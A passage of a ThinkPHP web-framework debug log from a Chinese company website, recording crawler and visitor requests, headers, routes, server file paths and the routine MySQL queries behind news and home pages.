'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 114 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 114 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:52:02+08:00 ] 49.7.21.104 GET /index/news/xwxq/id/135.html [ info ] www.kinsana.cn/index/news/xwxq/id/135.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,234.53kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/135_html' => '', 'id' => '135', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 135 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 135 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:01:29+08:00 ] 58.250.125.148 GET /index/news/xwxq/id/19.html [ info ] www.kinsana.cn/index/news/xwxq/id/19.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,043.87kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/19_html' => '', 'id' => '19', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 19 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:06:43+08:00 ] 49.7.21.104 GET /index/news/xwxq/id/135.html [ info ] www.kinsana.cn/index/news/xwxq/id/135.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,234.53kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/135_html' => '', 'id' => '135', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 135 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 135 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:10:27+08:00 ] 106.11.159.207 GET /static/css/iconfont.css [ info ] www.kinsana.cn/static/css/iconfont.css [运行时间:0.171875s][吞吐率:5.82req/s] [内存消耗:1,069.30kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'static', 1 => 'css', 2 => 'iconfont.css', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'YisouSpider', 'referer' => 'http://www.kinsana.cn/', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-CN,zh-TW;q=0.9,zh;q=0.8,en;q=0.7', 'accept-encoding' => 'gzip', 'accept' => '*/*', ) [ info ] [ PARAM ] array ( '/static/css/iconfont_css' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T04:15:50+08:00 ] 54.36.149.86 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.80kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:15:55+08:00 ] 168.119.68.242 GET /ajaxArea.php?id=1000139 [ info ] www.kinsana.cn/ajaxArea.php?id=1000139 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.59kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'accept' => '*/*', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T04:15:55+08:00 ] 168.119.68.242 POST /index/index/proapi.html [ info ] www.kinsana.cn/index/index/proapi.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,904.95kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'x-requested-with' => 'XMLHttpRequest', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'content-length' => '7', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:20:39+08:00 ] 49.7.21.104 GET /index/news/xwxq/id/135.html [ info ] www.kinsana.cn/index/news/xwxq/id/135.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,234.53kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/135_html' => '', 'id' => '135', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 135 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 135 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:39:56+08:00 ] 106.11.152.62 GET /index/news/xwxq/id/198.html [ info ] www.kinsana.cn/index/news/xwxq/id/198.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,176.01kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/198_html' => '', 'id' => '198', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 198 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 198 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:40:03+08:00 ] 220.249.46.22 GET /index/news/xwxq/id/99.html [ info ] www.kinsana.cn/index/news/xwxq/id/99.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,169.93kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/99_html' => '', 'id' => '99', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 99 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T04:42:00+08:00 ] 125.78.225.50 GET /plus/carbuyaction.php [ info ] www.kinsana.cn/plus/carbuyaction.php [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,069.81kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'plus', 1 => 'carbuyaction.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-cn,zh,en', 'accept-encoding' => 'gzip,deflate', 'referer' => 'http://www.kinsana.cn/plus/carbuyaction.php', 'user-agent' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)', 'accept' => '*/*', ) [ info ] [ PARAM ] array ( '/plus/carbuyaction_php' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T05:01:55+08:00 ] 47.98.97.252 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.70kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip', 'connection' => 'close', 'host' => 'www.kinsana.cn', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T05:03:01+08:00 ] 54.36.148.165 GET /index/news/xwxq/id/85.html [ info ] www.kinsana.cn/index/news/xwxq/id/85.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,194.43kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/85_html' => '', 'id' => '85', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 85 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 85 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T05:07:18+08:00 ] 220.181.108.175 GET /index/news/xwxq/id/185.html [ info ] www.kinsana.cn/index/news/xwxq/id/185.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,171.66kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/185_html' => '', 'id' => '185', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 185 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 185 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T05:23:29+08:00 ] 49.7.21.95 GET /index/news/xwxq/id/108.html [ info ] www.kinsana.cn/index/news/xwxq/id/108.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,169.80kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/108_html' => '', 'id' => '108', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 108 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 108 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T05:38:31+08:00 ] 54.36.149.36 GET /index/news/xwxq/id/80.html [ info ] www.kinsana.cn/index/news/xwxq/id/80.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,210.75kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/80_html' => '', 'id' => '80', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 80 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 80 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:00:29+08:00 ] 118.184.177.90 GET /index/news/xwxq/id/139.html [ info ] www.kinsana.cn/index/news/xwxq/id/139.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,198.39kb] [文件加载:55] [ info 